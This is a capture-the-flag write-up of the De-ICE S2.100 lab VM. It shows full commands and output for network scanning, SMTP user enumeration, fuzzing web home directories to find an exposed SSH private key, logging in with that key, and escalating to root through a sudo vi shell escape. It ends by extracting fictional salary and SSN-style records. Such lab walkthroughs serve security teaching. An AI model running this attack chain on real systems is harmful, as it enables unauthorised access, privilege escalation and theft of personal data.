published on in writeup
tags: de-ice

De-ICE S2.100

This is how I solved the De-ICE S2.100 challenge. The goal is to obtain salary information for the team of employees.

Netdiscover

As usual I ran netdiscover on the subnet range, and straight away something jumped out.

This VM was hosting two Apache services on different IPs.

[email protected]:~/de-ice/2.100# netdiscover -r 192.168.2.0/24 -i eth2

Currently scanning: Finished!   |   Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
_____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
-----------------------------------------------------------------------------
192.168.2.100   08:00:27:f6:e8:1d    01    060   CADMUS COMPUTER SYSTEMS
192.168.2.101   08:00:27:f6:e8:1d    01    060   CADMUS COMPUTER SYSTEMS

Nmap

I then scanned the two IPs with nmap.

[email protected]:~/de-ice/2.100# nmap -n -sV -A -p- 192.168.2.100; nmap -n -sV -A -p- 192.168.2.101

PORT    STATE  SERVICE  VERSION
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: Can't parse PASV response: "EOF"
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
| smtp-commands: slax.example.net Hello [192.168.2.200], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, 8BITMIME, SIZE, DSN, ETRN, AUTH DIGEST-MD5 CRAM-MD5, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.7 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation see 2.0.0 http://www.sendmail.org/email-addresses.html 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
|_imap-capabilities: CAPABILITY SCAN LOGIN-REFERRALS MAILBOX-REFERRALS MULTIAPPEND SORT UNSELECT NAMESPACE STARTTLS LITERAL+ IDLE THREAD=REFERENCES THREAD=ORDEREDSUBJECT OK IMAP4REV1 SASL-IR AUTH=LOGINA0001 completed BINARY
443/tcp closed https

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).

The Apache service on .100 contained a page containing a long list of users, and as before I took these to form a potential list of users. This list was quite a lot longer than in previous challenges, so the time it would take to bruteforce SSH logins would be longer than I was willing to spend.

SMTP

I decided to try and validate usernames via the SMTP service. After experimenting with different the methods, I had a valid list of users.

[email protected]:~/de-ice/2.100# smtp-user-enum -M RCPT -f root @ slax.example.net -U users -t 192.168.2.100
192.168.2.100: havisham exists
192.168.2.100: magwitch exists
192.168.2.100: pirrip exists

Nikto

I continued to enumerate the other services, but nothing popped until I ran nikto against the Apache service on .101 (I can imagine that send quite a few people crazy).

[email protected]:~/de-ice/2.100# nikto -h 192.168.2.101 -Display 124
+ OSVDB-637: /~root/: Allowed to browse root's home directory.

It seemed that the root user’s home directory was accessible through Apache, although it appeared empty.

Wfuzz

Wfuzz is a web crawler and fuzzing tool. With my list of valid users, I was able to locate their home directories also, but they also appeared empty. I used wfuzz to try and find hidden directories that are likely to appear in users’ home directories (.bashrc, .bash_history etc).

I got a hit for a .ssh directory in pirrip’s directory - within which were id_rsa files.

[email protected]:~/de-ice/2.100# wfuzz -c -z file,users --hc 404 http://192.168.2.101/~FUZZ/
00001:  C=200     11 L           46 W         570 Ch       " - havisham"
00002:  C=200     11 L           46 W         570 Ch       " - magwitch"
00003:  C=200     11 L           46 W         566 Ch       " - pirrip"

[email protected]:~/de-ice/2.100# wfuzz -c -zfile,users --hc 404 http://192.168.2.101/~FUZZ/.ssh
00003:  C=301      9 L           29 W         329 Ch       " - pirrip"

SSH

I downloaded the id_rsa key and was able to SSH in, as pirrip.

[email protected]:~/de-ice/2.100# chmod 400 id_rsa
[email protected]:~/de-ice/2.100# ssh -i id_rsa pirrip @ 192.168.2.100
Linux 2.6.16.
[email protected]:~$

Reviewing the passwd and group files showed that pirrip was part of the wheel group, but I was unable to use sudo as I didn’t know pirrip’s password. I began looking through the filesystem and eventually came across /var/spool/mail/pirrip. Within here was an email password reminder for pirrip, I tried this password with sudo and it worked.

[email protected]:~$ more /var/spool/mail/pirrip 
E-Mail: pirrip @ slax.example.net
Password: 0l1v3rTw1st

[email protected]:~$ sudo -l
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL

Sudo

I could now obtain a list of sudo rights for pirrip. I could’ve used this to obtain the shadow file, to try and crack the root password. However, an easier route to get a root shell, is through the vi text editor.

[email protected]:~$ sudo vi
:!/bin/bash
bash-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)

Flag

I then found great_expectations.zip within /root/.save/. Trying to extract this directly on the server resulted in error messages about limited disk space. So I transfered the file to my Kali machine using netcat.

No passwords were required to decompress, granting me access to Jan08.

[email protected]:~/de-ice/2.100# unzip great_expectations.zip 
[email protected]:~/de-ice/2.100# tar -xvf great_expectations.tar 
[email protected]:~/de-ice/2.100# cat Jan08 
 
Philip Pirrip:  734-67-0424 5.5% $74,224
Abel Magwitch:  816-03-0028 4.0% $53,122
Estella Havisham: 762-93-1073 12% $84,325